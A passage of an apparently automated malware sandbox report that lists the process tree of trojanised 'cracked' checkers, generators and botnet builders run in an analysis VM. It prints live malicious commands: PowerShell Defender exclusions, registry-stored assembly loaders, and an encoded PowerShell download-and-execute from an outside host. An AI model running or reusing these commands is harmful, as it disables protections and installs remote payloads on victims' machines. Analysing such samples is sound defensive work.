  - Suspicious behavior: EnumeratesProcesses
  PID:3732
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,17661238620445724848,1819758634440557858,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=46 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8020 /prefetch:1
  2⤵
  PID:3112
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,17661238620445724848,1819758634440557858,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=47 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4840 /prefetch:1
  2⤵
  PID:5468
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,17661238620445724848,1819758634440557858,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=48 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5524 /prefetch:1
  2⤵
  PID:1704
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,17661238620445724848,1819758634440557858,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=49 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3136 /prefetch:1
  2⤵
  PID:5804
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,17661238620445724848,1819758634440557858,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=50 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7236 /prefetch:1
  2⤵
  PID:2740
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,17661238620445724848,1819758634440557858,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=51 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3736 /prefetch:1
  2⤵
  PID:5428
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,17661238620445724848,1819758634440557858,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=52 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4860 /prefetch:1
  2⤵
  PID:4012
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,17661238620445724848,1819758634440557858,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=53 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5644 /prefetch:1
  2⤵
  PID:3324
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,17661238620445724848,1819758634440557858,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=55 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5948 /prefetch:1
  2⤵
  PID:4176
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2108,17661238620445724848,1819758634440557858,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7736 /prefetch:8
  2⤵
  PID:728
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,17661238620445724848,1819758634440557858,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=58 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6976 /prefetch:1
  2⤵
  PID:5536
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,17661238620445724848,1819758634440557858,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=59 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4824 /prefetch:1
  2⤵
  PID:944
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,17661238620445724848,1819758634440557858,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=60 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6660 /prefetch:1
  2⤵
  PID:13392
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,17661238620445724848,1819758634440557858,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=61 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7736 /prefetch:1
  2⤵
  PID:13440
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,17661238620445724848,1819758634440557858,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=62 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5984 /prefetch:1
  2⤵
  PID:14324
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,17661238620445724848,1819758634440557858,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=63 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6660 /prefetch:1
  2⤵
  PID:10640

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1788

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2092

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:2128

C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\Downloads\Generators_PACK.rar"
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops desktop.ini file(s)
- Suspicious use of AdjustPrivilegeToken
PID:6056

C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\Downloads\Checkers_PACK.rar"
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops desktop.ini file(s)
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
PID:2192

C:\Users\Admin\Desktop\Generators PACK\combolist generator BY X-KILLER\combolist generator BY X-KILLER.exe
"C:\Users\Admin\Desktop\Generators PACK\combolist generator BY X-KILLER\combolist generator BY X-KILLER.exe"
1⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1804
- C:\Users\Admin\Desktop\Generators PACK\combolist generator BY X-KILLER\GatherCfg\Launcher.exe
  "C:\Users\Admin\Desktop\Generators PACK\combolist generator BY X-KILLER\GatherCfg\Launcher.exe"
  2⤵
  - Checks computer location settings
  - Drops startup file
  - Executes dropped EXE
  - Loads dropped DLL
  - Adds Run key to start application
  - Drops file in Windows directory
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3356
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath C:\Windows\IMF\
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1040
- - C:\Windows\IMF\Windows Services.exe
    "C:\Windows\IMF\Windows Services.exe" {Arguments If Needed}
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4464
  - - C:\Windows\IMF\Secure System Shell.exe
      "C:\Windows\IMF\Secure System Shell.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1260
  - - C:\Windows\IMF\Runtime Explorer.exe
      "C:\Windows\IMF\Runtime Explorer.exe"
      4⤵
      Checks computer location settings
      Executes dropped EXE
      Loads dropped DLL
      Adds Run key to start application
      System Location Discovery: System Language Discovery
      Suspicious use of SetWindowsHookEx
      PID:2016
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath C:\Users\Admin\AppData\Roaming\
        5⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:340
- C:\Users\Admin\Desktop\Generators PACK\combolist generator BY X-KILLER\GatherCfg\SaveSoft.exe
  "C:\Users\Admin\Desktop\Generators PACK\combolist generator BY X-KILLER\GatherCfg\SaveSoft.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of SetWindowsHookEx
  PID:5928

C:\Users\Admin\Desktop\Checkers PACK\MultiChecker 1.05 Cracked By Devil\Multichecker 1.05.exe
"C:\Users\Admin\Desktop\Checkers PACK\MultiChecker 1.05 Cracked By Devil\Multichecker 1.05.exe"
1⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:236
- C:\Users\Admin\Desktop\Checkers PACK\MultiChecker 1.05 Cracked By Devil\data\Launcher.exe
  "C:\Users\Admin\Desktop\Checkers PACK\MultiChecker 1.05 Cracked By Devil\data\Launcher.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4504
- C:\Users\Admin\Desktop\Checkers PACK\MultiChecker 1.05 Cracked By Devil\data\xnet.exe
  "C:\Users\Admin\Desktop\Checkers PACK\MultiChecker 1.05 Cracked By Devil\data\xnet.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of AdjustPrivilegeToken
  PID:6008
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 6008 -s 22344
    3⤵
    - Program crash
    PID:4744

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 6008 -ip 6008
1⤵
PID:5536

C:\Users\Admin\Desktop\Checkers PACK\MultyX Cracked v1.5\Mult-Cracked.exe
"C:\Users\Admin\Desktop\Checkers PACK\MultyX Cracked v1.5\Mult-Cracked.exe"
1⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1204
- C:\Users\Admin\Desktop\Checkers PACK\MultyX Cracked v1.5\Data\Launcher.exe
  "C:\Users\Admin\Desktop\Checkers PACK\MultyX Cracked v1.5\Data\Launcher.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  - Suspicious use of AdjustPrivilegeToken
  PID:2516
- C:\Users\Admin\Desktop\Checkers PACK\MultyX Cracked v1.5\Data\sysMult.exe
  "C:\Users\Admin\Desktop\Checkers PACK\MultyX Cracked v1.5\Data\sysMult.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  PID:5792

C:\Users\Admin\Desktop\Checkers PACK\MultiChecker 1.05 Cracked By Devil\Multichecker 1.05.exe
"C:\Users\Admin\Desktop\Checkers PACK\MultiChecker 1.05 Cracked By Devil\Multichecker 1.05.exe"
1⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5896
- C:\Users\Admin\Desktop\Checkers PACK\MultiChecker 1.05 Cracked By Devil\data\Launcher.exe
  "C:\Users\Admin\Desktop\Checkers PACK\MultiChecker 1.05 Cracked By Devil\data\Launcher.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  - Suspicious use of AdjustPrivilegeToken
  PID:568
- C:\Users\Admin\Desktop\Checkers PACK\MultiChecker 1.05 Cracked By Devil\data\xnet.exe
  "C:\Users\Admin\Desktop\Checkers PACK\MultiChecker 1.05 Cracked By Devil\data\xnet.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of AdjustPrivilegeToken
  PID:644
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 644 -s 13840
    3⤵
    - Program crash
    PID:2824

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 644 -ip 644
1⤵
PID:4672

C:\Users\Admin\Desktop\Generators PACK\Netflix GC Generator By SpaceXVIII\Netflix GC Cracked.to.exe
"C:\Users\Admin\Desktop\Generators PACK\Netflix GC Generator By SpaceXVIII\Netflix GC Cracked.to.exe"
1⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3056
- C:\Users\Admin\Desktop\Generators PACK\Netflix GC Generator By SpaceXVIII\Gen\Launcher.exe
  "C:\Users\Admin\Desktop\Generators PACK\Netflix GC Generator By SpaceXVIII\Gen\Launcher.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  - Suspicious use of AdjustPrivilegeToken
  PID:4852
- C:\Users\Admin\Desktop\Generators PACK\Netflix GC Generator By SpaceXVIII\Gen\GC.exe
  "C:\Users\Admin\Desktop\Generators PACK\Netflix GC Generator By SpaceXVIII\Gen\GC.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  PID:4168
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://cracked.to/SpaceXVIII
    3⤵
    PID:1040
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x144,0x148,0x14c,0x120,0x150,0x7ffc09a746f8,0x7ffc09a74708,0x7ffc09a74718
      4⤵
      PID:5300

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\Generators PACK\Netflix GC Generator By SpaceXVIII\codes.txt
1⤵
PID:2492

C:\Users\Admin\Desktop\Checkers PACK\NetFlix GC Checker by xRisky\NetFlix GC Checker by xRisky.exe
"C:\Users\Admin\Desktop\Checkers PACK\NetFlix GC Checker by xRisky\NetFlix GC Checker by xRisky.exe"
1⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5388
- C:\Users\Admin\Desktop\Checkers PACK\NetFlix GC Checker by xRisky\data\Launcher.exe
  "C:\Users\Admin\Desktop\Checkers PACK\NetFlix GC Checker by xRisky\data\Launcher.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  - Suspicious use of AdjustPrivilegeToken
  PID:5304
- C:\Users\Admin\Desktop\Checkers PACK\NetFlix GC Checker by xRisky\data\litedb.exe
  "C:\Users\Admin\Desktop\Checkers PACK\NetFlix GC Checker by xRisky\data\litedb.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  - Modifies registry class
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of SetWindowsHookEx
  PID:4192

C:\Users\Admin\Desktop\Generators PACK\Proxy Generator 1.3.6 BETA\Proxy Generator 1.3.6 BETA.exe
"C:\Users\Admin\Desktop\Generators PACK\Proxy Generator 1.3.6 BETA\Proxy Generator 1.3.6 BETA.exe"
1⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5512
- C:\Users\Admin\Desktop\Generators PACK\Proxy Generator 1.3.6 BETA\bin\Launcher.exe
  "C:\Users\Admin\Desktop\Generators PACK\Proxy Generator 1.3.6 BETA\bin\Launcher.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  PID:5244
- C:\Users\Admin\Desktop\Generators PACK\Proxy Generator 1.3.6 BETA\bin\sysBeta.exe
  "C:\Users\Admin\Desktop\Generators PACK\Proxy Generator 1.3.6 BETA\bin\sysBeta.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: GetForegroundWindowSpam
  PID:5728

C:\Users\Admin\Desktop\Checkers PACK\Netflix Checker by GOD Cracked By GM`ka\Netflix by GOD Cracked By GM`ka.exe
"C:\Users\Admin\Desktop\Checkers PACK\Netflix Checker by GOD Cracked By GM`ka\Netflix by GOD Cracked By GM`ka.exe"
1⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5908
- C:\Users\Admin\Desktop\Checkers PACK\Netflix Checker by GOD Cracked By GM`ka\xNet\Launcher.exe
  "C:\Users\Admin\Desktop\Checkers PACK\Netflix Checker by GOD Cracked By GM`ka\xNet\Launcher.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  PID:5288
- C:\Users\Admin\Desktop\Checkers PACK\Netflix Checker by GOD Cracked By GM`ka\xNet\procs.exe
  "C:\Users\Admin\Desktop\Checkers PACK\Netflix Checker by GOD Cracked By GM`ka\xNet\procs.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:6128
- - C:\Users\Admin\AppData\Roaming\Checker Netflix.exe
    "C:\Users\Admin\AppData\Roaming\Checker Netflix.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:712
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\l1l1l.vbs"
    3⤵
    - Checks computer location settings
    - Drops startup file
    - System Location Discovery: System Language Discovery
    PID:5296
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit [Reflection.Assembly]::'Load'((Get-ItemProperty HKCU:\Software\tsQKDrCBEkat).evTHJP).'EntryPoint'.'Invoke'($Null,$Null)
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Loads dropped DLL
      System Location Discovery: System Language Discovery
      PID:5432
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\powershell.js"
    3⤵
    - Checks computer location settings
    - System Location Discovery: System Language Discovery
    PID:5772
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noP -sta -w 1 -enc WwBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgBDAHUAcgByAGUAbgB0AEQAbwBtAGEAaQBuAC4ATABvAGEAZAAoAFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAGIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8ANgAuAHQAbwBwADQAdABvAHAALgBuAGUAdAAvAHAAXwAxADMANQAyADkAdAA2AHIANwAxAC4AagBwAGcAJwApACkAKQAuAEUAbgB0AHIAeQBQAG8AaQBuAHQALgBpAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsACQAbgB1AGwAbAApAA==
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      PID:5388
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\r1r1.vbs"
    3⤵
    - Checks computer location settings
    - Drops startup file
    - System Location Discovery: System Language Discovery
    PID:2008
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit [Reflection.Assembly]::'Load'((Get-ItemProperty HKCU:\Software\vLEwUGUT).gukeLLVoun).'EntryPoint'.'Invoke'($Null,$Null)
      4⤵
      Command and Scripting Interpreter: PowerShell
      Drops file in System32 directory
      System Location Discovery: System Language Discovery
      PID:3468

C:\Users\Admin\Desktop\Checkers PACK\Netflix Checker v0.2.1\Netflix Checker v0.2.1.exe
"C:\Users\Admin\Desktop\Checkers PACK\Netflix Checker v0.2.1\Netflix Checker v0.2.1.exe"
1⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4100
- C:\Users\Admin\Desktop\Checkers PACK\Netflix Checker v0.2.1\Microsoft.VC100.CRT\Launcher.exe
  "C:\Users\Admin\Desktop\Checkers PACK\Netflix Checker v0.2.1\Microsoft.VC100.CRT\Launcher.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  PID:5252
- C:\Users\Admin\Desktop\Checkers PACK\Netflix Checker v0.2.1\Microsoft.VC100.CRT\sys.exe
  "C:\Users\Admin\Desktop\Checkers PACK\Netflix Checker v0.2.1\Microsoft.VC100.CRT\sys.exe"
  2⤵
  - Executes dropped EXE
  PID:1960

C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\Downloads\Botnets_PACK.rar"
1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3320

C:\Users\Admin\Desktop\Botnets PACK\Amadey Cracked\Amadey Cracked [XakFor.Net].exe
"C:\Users\Admin\Desktop\Botnets PACK\Amadey Cracked\Amadey Cracked [XakFor.Net].exe"
1⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4176
- C:\Users\Admin\Desktop\Botnets PACK\Amadey Cracked\xpti\Launcher.exe
  "C:\Users\Admin\Desktop\Botnets PACK\Amadey Cracked\xpti\Launcher.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  PID:4852
- C:\Users\Admin\Desktop\Botnets PACK\Amadey Cracked\xpti\svg.exe
  "C:\Users\Admin\Desktop\Botnets PACK\Amadey Cracked\xpti\svg.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Modifies registry class
  - Suspicious use of SetWindowsHookEx
  PID:4288
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://xakfor.net/forum/
    3⤵
    PID:5800
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x144,0x148,0x14c,0x120,0x150,0x7ffc09a746f8,0x7ffc09a74708,0x7ffc09a74718
      4⤵
      PID:4584

C:\Users\Admin\Desktop\Botnets PACK\BetaBotBuilder Leaked by Bull\BetaBotBuilderGUI.exe
"C:\Users\Admin\Desktop\Botnets PACK\BetaBotBuilder Leaked by Bull\BetaBotBuilderGUI.exe"
1⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:568
- C:\Users\Admin\Desktop\Botnets PACK\BetaBotBuilder Leaked by Bull\npnul32\Launcher.exe
  "C:\Users\Admin\Desktop\Botnets PACK\BetaBotBuilder Leaked by Bull\npnul32\Launcher.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  PID:5896
- C:\Users\Admin\Desktop\Botnets PACK\BetaBotBuilder Leaked by Bull\npnul32\secur32.exe
  "C:\Users\Admin\Desktop\Botnets PACK\BetaBotBuilder Leaked by Bull\npnul32\secur32.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - System Location Discovery: System Language Discovery
  PID:2524

C:\Users\Admin\Desktop\Generators PACK\Minecraft Generator By Zed\Minecraft Generator By Zed.exe
"C:\Users\Admin\Desktop\Generators PACK\Minecraft Generator By Zed\Minecraft Generator By Zed.exe"
1⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:12680
- C:\Users\Admin\Desktop\Generators PACK\Minecraft Generator By Zed\xml\Launcher.exe
  "C:\Users\Admin\Desktop\Generators PACK\Minecraft Generator By Zed\xml\Launcher.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  PID:12756
- C:\Users\Admin\Desktop\Generators PACK\Minecraft Generator By Zed\xml\lib.exe
  "C:\Users\Admin\Desktop\Generators PACK\Minecraft Generator By Zed\xml\lib.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:12808
- - C:\ProgramData\NSGMFX\UMT.exe
    "C:\ProgramData\NSGMFX\UMT.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Adds Run key to start application
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: GetForegroundWindowSpam
    - Suspicious use of SetWindowsHookEx
    PID:12908

C:\Users\Admin\Desktop\Generators PACK\Netflix GC Generator By SpaceXVIII\Netflix GC Cracked.to.exe
"C:\Users\Admin\Desktop\Generators PACK\Netflix GC Generator By SpaceXVIII\Netflix GC Cracked.to.exe"
1⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:13020
- C:\Users\Admin\Desktop\Generators PACK\Netflix GC Generator By SpaceXVIII\Gen\Launcher.exe
  "C:\Users\Admin\Desktop\Generators PACK\Netflix GC Generator By SpaceXVIII\Gen\Launcher.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  PID:13088
- C:\Users\Admin\Desktop\Generators PACK\Netflix GC Generator By SpaceXVIII\Gen\GC.exe
  "C:\Users\Admin\Desktop\Generators PACK\Netflix GC Generator By SpaceXVIII\Gen\GC.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  PID:13148
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
